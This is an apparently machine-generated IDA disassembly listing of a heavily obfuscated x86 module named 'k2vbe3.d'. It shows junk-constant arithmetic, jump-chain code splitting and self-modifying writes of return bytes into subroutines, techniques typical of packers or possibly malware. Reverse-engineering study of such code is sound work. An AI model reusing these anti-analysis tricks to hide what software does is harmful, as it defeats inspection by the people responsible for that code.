loc_45506F:				; CODE XREF: k2vbe3.d:00444786j
		mov	eax, [esp]
		push	edi
		mov	edi, edx
		xchg	edi, [esp]
		call	sub_4479A1
		jmp	loc_44B68F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_455082:				; CODE XREF: sub_457DCA-2BADj
		add	eax, 53B992CCh
		add	eax, ebp
		add	eax, 83E65BE0h
		mov	eax, [eax]
		cmp	byte ptr [eax],	0
		jmp	loc_4595C7
; END OF FUNCTION CHUNK	FOR sub_457DCA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_229. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443CD9

loc_45509B:				; CODE XREF: sub_443CD9+183EFj
		jmp	loc_44716A
; END OF FUNCTION CHUNK	FOR sub_443CD9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450983

loc_4550A0:				; CODE XREF: sub_450983-D29Ej
		jmp	loc_44FB5F
; END OF FUNCTION CHUNK	FOR sub_450983
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF59

loc_4550A5:				; CODE XREF: sub_43FF59-13ADj
		jmp	loc_4418E1
; END OF FUNCTION CHUNK	FOR sub_43FF59
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_4550AA:				; CODE XREF: sub_43F7AC+13322j
					; k2vbe3.d:00456981j
		or	edx, 0A0386BAFh
		test	edx, 40h
		jmp	loc_4570D2
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_4550BB:				; CODE XREF: sub_4553CC-186D6j
					; sub_4553CC:loc_449C4Ej ...
		push	eax
		lea	eax, aBoacqdrqFf6+3
		push	eax
		push	edi
		push	eax
		pop	edi
		xchg	edi, [esp+8+var_8]
		jmp	loc_4506B9
; ---------------------------------------------------------------------------

loc_4550CE:				; CODE XREF: sub_4553CCj
		push	0B165D64Ch
		jmp	loc_44F57B
; END OF FUNCTION CHUNK	FOR sub_4553CC
; ---------------------------------------------------------------------------

loc_4550D8:				; DATA XREF: sub_447B71:loc_4552E2o
		xchg	eax, [esp]
		push	eax
		pop	edx
		push	offset loc_44E1EA
		jmp	loc_44172E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4490B2

loc_4550E7:				; CODE XREF: sub_4490B2:loc_447752j
		jge	loc_456BE1

loc_4550ED:				; CODE XREF: sub_44B999-5A9j
		jmp	nullsub_282
; END OF FUNCTION CHUNK	FOR sub_4490B2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456C5F

loc_4550F2:				; CODE XREF: sub_456C5F-12EE1j
		jmp	nullsub_228
; END OF FUNCTION CHUNK	FOR sub_456C5F
; ---------------------------------------------------------------------------
		and	ebx, eax
		rol	eax, 3
		jmp	loc_43C09E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D31B

loc_455101:				; CODE XREF: k2vbe3.d:loc_43C46Aj
					; sub_43D31B:loc_43D31Cj
		push	0A4F49872h
		pop	esi
		or	esi, 69803399h
		cmp	esi, 8F8AD1CEh
		jmp	loc_44500A
; END OF FUNCTION CHUNK	FOR sub_43D31B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_455118:				; CODE XREF: sub_43C3A9+5CA5j
					; sub_43C3A9:loc_449F7Bj
		mov	eax, 0CFF9C25h
		push	eax
		push	17900DBEh
		pop	eax
		jmp	loc_457227
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; ---------------------------------------------------------------------------

loc_455129:				; CODE XREF: k2vbe3.d:00453615j
		jns	loc_443388

; =============== S U B	R O U T	I N E =======================================



sub_45512F	proc near		; CODE XREF: k2vbe3.d:0044823Fj
					; sub_44AD9D+6p

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043C9FB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CCA0 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043E4A6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F59B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004436FC SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004461E1 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00447308 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004485A0 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00449B1C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00449E21 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DFDB SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004510E1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045565D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A83C SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0045B8A4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045BA35 SIZE 00000005 BYTES

		xchg	ebx, [esp+8+var_8]
		pop	ebx
		mov	eax, ds:dword_44BDA8
		or	eax, eax
		jnz	loc_4510E1
		jmp	loc_45565D
sub_45512F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529D2

loc_455146:				; CODE XREF: sub_4529D2:loc_4529DDj
		push	0A08844F9h
		pop	edi
		or	edi, 0F419BB8Ah
		rol	edi, 0Ah
		jmp	loc_43C5F8
; END OF FUNCTION CHUNK	FOR sub_4529D2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B39A

loc_45515A:				; CODE XREF: sub_44B39A:loc_446A3Fj
		pop	edi
		and	edi, 207F286Ch
		add	edi, 0E032984Bh
		xchg	edi, [esp+8+var_8]
		jmp	sub_444615
; END OF FUNCTION CHUNK	FOR sub_44B39A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_45516F:				; CODE XREF: sub_44921C+564Cj
		inc	dword ptr [ebp-24h]
		jmp	loc_43FD46
; END OF FUNCTION CHUNK	FOR sub_44921C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_455177:				; CODE XREF: sub_454EDD-16C40j
					; sub_45A9B3-1BB8Fj ...
		mov	eax, [ebp-10h]
		mov	esp, ebp
		pop	ebp
		jmp	loc_44E1BD
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C310

loc_455182:				; CODE XREF: sub_44C310:loc_45764Aj
		xchg	ebx, [esp+8+var_8]
		call	sub_43CC89
		push	offset loc_45519B
		jmp	loc_455390
; END OF FUNCTION CHUNK	FOR sub_44C310
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_290. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_455195:				; CODE XREF: sub_44C90E:loc_44EE55j
		push	ecx
		jmp	loc_43EE66
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------

loc_45519B:				; DATA XREF: sub_44C310+8E7Ao
		cmp	dword ptr [ebp-0Ch], 0
		jz	loc_43D851
		jmp	loc_44C858
; ---------------------------------------------------------------------------

loc_4551AA:				; CODE XREF: k2vbe3.d:0043FCB2j
		or	edx, esi

; =============== S U B	R O U T	I N E =======================================



sub_4551AC	proc near		; CODE XREF: sub_45B20A-11A19p

; FUNCTION CHUNK AT 0043C67E SIZE 00000010 BYTES

		xchg	esi, [esp+0]
		pop	esi
		mov	[esi], eax
		pop	esi

loc_4551B3:				; CODE XREF: sub_43C68E+7j
		push	41BA335Ah
		pop	eax
		or	eax, 0E6E5E004h
		jmp	loc_43C67E
sub_4551AC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A306

loc_4551C4:				; CODE XREF: sub_44A306+4FDFj
		pop	esi
		or	esi, 1F8695E8h
		add	esi, 2055B3E0h
		xchg	esi, [esp+4+var_4]
		jmp	sub_45B20A
; END OF FUNCTION CHUNK	FOR sub_44A306
; ---------------------------------------------------------------------------
		call	sub_458746
; START	OF FUNCTION CHUNK FOR sub_45762D

loc_4551DE:				; CODE XREF: sub_45762D-3AAj
		jmp	loc_4422C2
; END OF FUNCTION CHUNK	FOR sub_45762D
; ---------------------------------------------------------------------------

loc_4551E3:				; DATA XREF: sub_449774:loc_44DE72o
		mov	eax, [esp]
		push	offset sub_43E753
		jmp	locret_44BD6A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_38. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_4551F1:				; CODE XREF: sub_44921C+A393j
		jmp	loc_45A5F2
; END OF FUNCTION CHUNK	FOR sub_44921C
; ---------------------------------------------------------------------------

loc_4551F6:				; CODE XREF: k2vbe3.d:0043E857j
		js	sub_44D2F1

; =============== S U B	R O U T	I N E =======================================



sub_4551FC	proc near		; CODE XREF: sub_44AD9D-AC8Fp

; FUNCTION CHUNK AT 00443D1C SIZE 0000000A BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	edx
		mov	edx, eax
		jmp	loc_443D1C
sub_4551FC	endp

; ---------------------------------------------------------------------------

loc_455208:				; CODE XREF: k2vbe3.d:00459025j
		jb	loc_44FB9E
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_45520E:				; CODE XREF: sub_457DCA-113F4j
		and	eax, 0DB398494h
		rol	eax, 2
		and	eax, 0AB60B85Ch
		jmp	loc_455082
; END OF FUNCTION CHUNK	FOR sub_457DCA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444297

loc_455222:				; CODE XREF: sub_444297:loc_440F6Cj
		add	eax, 0E42C815h
		sub	eax, 8ED0C968h

loc_45522E:				; CODE XREF: k2vbe3.d:00442DB3j
		xor	eax, 0E7B1BE6h
		add	eax, ebp
		call	sub_4454EF
; END OF FUNCTION CHUNK	FOR sub_444297
; START	OF FUNCTION CHUNK FOR sub_4586B3

loc_45523B:				; CODE XREF: sub_4586B3+1j
		jmp	sub_44D49F
; END OF FUNCTION CHUNK	FOR sub_4586B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448472

loc_455240:				; CODE XREF: sub_448472+9FC1j
		jmp	sub_451759
; END OF FUNCTION CHUNK	FOR sub_448472
; ---------------------------------------------------------------------------

loc_455245:				; CODE XREF: k2vbe3.d:0043CE16j
		jno	nullsub_326

; =============== S U B	R O U T	I N E =======================================



sub_45524B	proc near		; CODE XREF: sub_44249A+425Bp

; FUNCTION CHUNK AT 0044F975 SIZE 0000000A BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		add	ecx, 6C593C78h
		mov	[ecx], eax
		jmp	loc_44F975
sub_45524B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	eax, 0A4C05BA6h
		call	sub_4553CC
		mov	ds:dword_41E180, eax
		lea	eax, nullsub_22
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_22
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4478AB

loc_45527A:				; CODE XREF: sub_4478ABj
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	edx
		jmp	loc_4528E0
; END OF FUNCTION CHUNK	FOR sub_4478AB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_455284:				; CODE XREF: sub_443FC1:loc_449D25j
		jno	loc_44ABC2
		jmp	loc_43CE36
; END OF FUNCTION CHUNK	FOR sub_443FC1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_90. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_455290:				; CODE XREF: sub_44C90E:loc_44321Aj
					; DATA XREF: sub_45325C-454Ao
		mov	ds:off_41E12C, eax
		lea	eax, sub_441FEB
		mov	byte ptr [eax],	0C3h
		jmp	sub_441FEB
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
		call	sub_44DEC3
; START	OF FUNCTION CHUNK FOR sub_44B320

loc_4552A9:				; CODE XREF: sub_44B320+Fj
		jmp	nullsub_470
; END OF FUNCTION CHUNK	FOR sub_44B320
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A1B1

loc_4552AE:				; CODE XREF: sub_44A1B1+14j
		jmp	loc_44D92C
; END OF FUNCTION CHUNK	FOR sub_44A1B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CF35

loc_4552B3:				; CODE XREF: sub_43CF35+11j
		jmp	loc_448853
; END OF FUNCTION CHUNK	FOR sub_43CF35
; ---------------------------------------------------------------------------

loc_4552B8:				; CODE XREF: k2vbe3.d:0045137Fj
		jno	loc_44DF4A

; =============== S U B	R O U T	I N E =======================================



sub_4552BE	proc near		; CODE XREF: sub_4443DD-3702p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044149B SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004462AC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045476B SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		xchg	esi, [esp-4+arg_0]
		mov	ecx, esi
		pop	esi
		jmp	loc_4462AC
sub_4552BE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FF34

loc_4552CD:				; CODE XREF: sub_44FF34:loc_44FF43j
		cmp	ecx, edi
		jmp	loc_455637
; END OF FUNCTION CHUNK	FOR sub_44FF34
; ---------------------------------------------------------------------------
		not	ebx
		pushf
		jmp	sub_4575BD
; ---------------------------------------------------------------------------
		jmp	ds:off_41E034
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447B71

loc_4552E2:				; CODE XREF: k2vbe3.d:004427A5j
					; sub_447B71+7j ...
		push	offset loc_4550D8
		jmp	nullsub_183
; END OF FUNCTION CHUNK	FOR sub_447B71
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A58

loc_4552EC:				; CODE XREF: sub_457A58:loc_43C113j
		push	edx
		nop
		push	18228EF8h
		pop	eax
		or	eax, 98FD3ABEh
		jmp	loc_43EDAE
; END OF FUNCTION CHUNK	FOR sub_457A58
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_4552FF:				; CODE XREF: sub_43CCD0:loc_45A5FAj
		push	6038F7CDh
		xchg	ebx, [esp+0Ch+var_C]
		mov	edx, ebx
		pop	ebx
		jmp	loc_444847
; END OF FUNCTION CHUNK	FOR sub_43CCD0

; =============== S U B	R O U T	I N E =======================================



sub_45530F	proc near		; CODE XREF: k2vbe3.d:0044E961j
					; sub_450983:loc_451059j ...

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043C4B1 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0043C4E5 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0043E5AE SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00444095 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449122 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044B0A3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E966 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F4AE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004501B0 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045886D SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00458E13 SIZE 0000000A BYTES

		jno	loc_44E966
		pop	edx
		mov	eax, [esp-8+arg_4]
		push	edx
		push	ebx
		jmp	loc_444095
sub_45530F	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_183. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A56B

loc_455321:				; CODE XREF: sub_44A56B+1ABCj
		jmp	loc_4474BF
; END OF FUNCTION CHUNK	FOR sub_44A56B
; ---------------------------------------------------------------------------

loc_455326:				; CODE XREF: k2vbe3.d:00447F89j
		jmp	loc_452E54
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------

loc_45532C:				; CODE XREF: k2vbe3.d:00458487j
		jmp	locret_440A56
; ---------------------------------------------------------------------------

loc_455331:				; CODE XREF: k2vbe3.d:loc_44BAD2j
		call	sub_43C04E
		test	al, al
		jz	locret_44D802
		jmp	loc_43CB0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_455343:				; CODE XREF: sub_44C90E:loc_444B39j
		jz	loc_44A4C5
		jmp	loc_4530EF
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453AE8

loc_45534E:				; CODE XREF: sub_453AE8:loc_44AC13j
		cdq
		add	ebp, ebx
		push	edi
		jmp	loc_441F8B
; END OF FUNCTION CHUNK	FOR sub_453AE8
; ---------------------------------------------------------------------------
		mov	eax, 72B18749h
		push	offset sub_4487ED
		jmp	locret_44AF60
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_455366:				; CODE XREF: sub_44469A+8j
		push	ecx
		call	sub_44945C

loc_45536C:				; CODE XREF: sub_4461A0+Cj
		jmp	loc_4598DD
; END OF FUNCTION CHUNK	FOR sub_44469A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448052

loc_455371:				; CODE XREF: sub_448052-215j
		call	sub_45B20A
		push	ebx
		push	0A5F9A4B1h
		pop	ebx
		rol	ebx, 5
		jnb	loc_441519
; END OF FUNCTION CHUNK	FOR sub_448052
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_455386:				; CODE XREF: sub_44C90E+9E95j
		jmp	loc_445F63
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444966

loc_45538B:				; CODE XREF: sub_444966+11D52j
		jmp	loc_44FD23
; END OF FUNCTION CHUNK	FOR sub_444966
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C310

loc_455390:				; CODE XREF: sub_44C310+8E7Fj
		jmp	nullsub_244
; END OF FUNCTION CHUNK	FOR sub_44C310
; ---------------------------------------------------------------------------
		shr	esi, 0Bh
		jmp	loc_441513
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_45539D:				; CODE XREF: sub_44ED3C-23B1j
		mov	[eax], edi
		sbb	edi, 3D3B09ADh
		rol	ebp, 17h

loc_4553A8:				; CODE XREF: sub_44ED3C:loc_44C97Fj
		or	eax, 1298106Bh
		js	loc_456AB7
		or	edx, ebx
		jz	locret_4569E2
		jmp	loc_456AB4
; END OF FUNCTION CHUNK	FOR sub_44ED3C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449FE9

loc_4553C1:				; CODE XREF: sub_449FE9:loc_45073Bj
		call	sub_44E0F6

loc_4553C6:				; CODE XREF: sub_44E503+C408j
		jmp	loc_4405A5
; END OF FUNCTION CHUNK	FOR sub_449FE9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_445. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_4553CC	proc near		; CODE XREF: k2vbe3.d:loc_43C130p
					; k2vbe3.d:loc_43C18Bp	...

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043CCEF SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0043D9BF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D9D5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DA3F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043EF2E SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043FA55 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043FC91 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00440B62 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004421B2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044275A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004428CA SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00446788 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449087 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004490A5 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00449C4E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BE3E SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044C402 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C4E4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D30B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DE4F SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044F021 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044F316 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044F3FD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F57B SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00450297 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004506B9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450786 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00450DC3 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004513B9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004537C2 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00453AC2 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00453BDD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454A29 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004550BB SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045A2E4 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0045A7E0 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045BD67 SIZE 00000005 BYTES

		jz	loc_4550CE

loc_4553D2:				; CODE XREF: k2vbe3.d:0045A248j
		mov	edx, ds:dword_43C810
		or	edx, edx
		jnz	loc_45A7E0
		jmp	loc_446788
sub_4553CC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4553E5:				; CODE XREF: k2vbe3.d:0044A3A4j
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp]
		push	ebx
		push	edi
		push	edx
		pop	edi
		xchg	edi, [esp]
		jmp	loc_44A528
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455C7A

loc_4553F7:				; CODE XREF: sub_455C7A:loc_43C783j
		add	eax, [ebp-4]
		mov	[ebp-18h], eax
		push	0D5F2C7D9h
		pop	eax
		xor	eax, 936F398Eh
		jmp	loc_43DD9B
; END OF FUNCTION CHUNK	FOR sub_455C7A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_45540E:				; CODE XREF: sub_43CCD0+115A9j
					; sub_43CCD0+19F40j
		add	edi, 41595AF1h
		call	sub_447B71
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; START	OF FUNCTION CHUNK FOR sub_44B477

loc_455419:				; CODE XREF: sub_44B477+8j
		jmp	loc_454B56
; END OF FUNCTION CHUNK	FOR sub_44B477
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443C0D

loc_45541E:				; CODE XREF: sub_443C0D+CA17j
		jz	loc_455433
		inc	[ebp+var_8]

loc_455427:				; CODE XREF: sub_443C0D:loc_446682j
					; sub_443C0D:loc_44D7CDj
		mov	eax, [ebp+var_8]
		pop	ecx
		pop	ecx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_443C0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4445E2

loc_45542E:				; CODE XREF: sub_4445E2+3D55j
		jmp	nullsub_187
; END OF FUNCTION CHUNK	FOR sub_4445E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443C0D

loc_455433:				; CODE XREF: sub_443C0D:loc_45541Ej
		mov	eax, [ebp+arg_0]
		jmp	loc_44BCA6
; END OF FUNCTION CHUNK	FOR sub_443C0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443528

loc_45543B:				; CODE XREF: sub_443528+Aj
		cmp	dword ptr [ebp-8], 0
		call	sub_45299C
; END OF FUNCTION CHUNK	FOR sub_443528
; START	OF FUNCTION CHUNK FOR sub_44A1B1

loc_455444:				; CODE XREF: sub_44A1B1-CE7j
		jmp	nullsub_188
; END OF FUNCTION CHUNK	FOR sub_44A1B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447585

loc_455449:				; CODE XREF: sub_447585+Aj
		jmp	loc_44F89F
; END OF FUNCTION CHUNK	FOR sub_447585

; =============== S U B	R O U T	I N E =======================================



sub_45544E	proc near		; CODE XREF: sub_4423A7+7p
					; k2vbe3.d:0044BA5Fj
		xchg	esi, [esp+0]
		pop	esi
		lea	eax, sub_44FDAC
		mov	byte ptr [eax],	0C3h
		jmp	sub_44FDAC
sub_45544E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_455460:				; CODE XREF: k2vbe3.d:loc_453E80j
		sub	edx, 4BA7C5Fh
		and	edx, 7366A4E8h
		add	edx, 0BDE1C943h
		xchg	edx, [esp]
		jmp	nullsub_3
; ---------------------------------------------------------------------------

loc_45547A:				; CODE XREF: k2vbe3.d:00459C66j
		jnz	loc_44EA39
		jmp	loc_4597BC
; ---------------------------------------------------------------------------

loc_455485:				; CODE XREF: k2vbe3.d:loc_44BD48j
		sub	edi, edx
		jmp	loc_44D7D7
; ---------------------------------------------------------------------------
		popf
		jmp	sub_44A306
; ---------------------------------------------------------------------------
		mov	ds:dword_41E0C8, eax
		lea	eax, nullsub_505
		mov	byte ptr [eax],	0C3h
		jmp	loc_44460B

; =============== S U B	R O U T	I N E =======================================



sub_4554A6	proc near		; CODE XREF: sub_41AA85+20p
					; sub_41C77E+26Ep ...

; FUNCTION CHUNK AT 0044B349 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044DE36 SIZE 00000005 BYTES

		call	sub_44B359
		jmp	loc_44DE36
sub_4554A6	endp

; ---------------------------------------------------------------------------

loc_4554B0:				; CODE XREF: k2vbe3.d:loc_447B7Ej
		push	8DFE561Eh
		pop	edi
		sub	edi, 942D5282h
		xor	edi, 0DF5AE1E0h
		add	edi, ebp
		add	edi, 0D9741D74h
		mov	[edi], eax
		jmp	loc_446970
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_163. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D823

loc_4554D2:				; CODE XREF: sub_43D823:loc_43F99Fj
		jmp	loc_44C18B
; END OF FUNCTION CHUNK	FOR sub_43D823
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_4554D7:				; CODE XREF: sub_44B94B+9DE0j
		jz	loc_440148
		jmp	loc_454742
; END OF FUNCTION CHUNK	FOR sub_44B94B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_328. PRESS KEYPAD	"+" TO EXPAND]
		dd offset sub_43E88E
; ---------------------------------------------------------------------------
		jmp	locret_454799
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_301. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44660F

loc_4554ED:				; CODE XREF: sub_44660F+BABFj
		adc	esi, ebp
		test	eax, 0B0A3F664h
		jmp	loc_446984
; END OF FUNCTION CHUNK	FOR sub_44660F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_42. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443F0D

loc_4554FB:				; CODE XREF: sub_443F0D+BDB0j
		jmp	loc_4418A6
; END OF FUNCTION CHUNK	FOR sub_443F0D

; =============== S U B	R O U T	I N E =======================================



sub_455500	proc near		; DATA XREF: sub_447692-AB47o

; FUNCTION CHUNK AT 00441C80 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442CFA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446DA5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CE56 SIZE 0000000B BYTES

		ror	eax, 1
		xor	eax, 1D81C093h
		ror	eax, 15h
		jnz	loc_441C80
		push	offset sub_4508AF
		jmp	loc_446DA5
sub_455500	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446258

loc_45551B:				; CODE XREF: sub_446258:loc_450B30j
		jl	loc_442E42

loc_455521:				; CODE XREF: sub_44D49F+7j
		jmp	loc_45032A
; END OF FUNCTION CHUNK	FOR sub_446258
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D9A7

loc_455526:				; CODE XREF: sub_44D9A7-2C6Ej
		jmp	loc_43F4D9
; END OF FUNCTION CHUNK	FOR sub_44D9A7
; ---------------------------------------------------------------------------

loc_45552B:				; CODE XREF: k2vbe3.d:00440FC4j
		jmp	loc_43D721
; ---------------------------------------------------------------------------
		adc	eax, edx
		test	eax, 94BAF2E8h
		jmp	loc_442E3C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455829

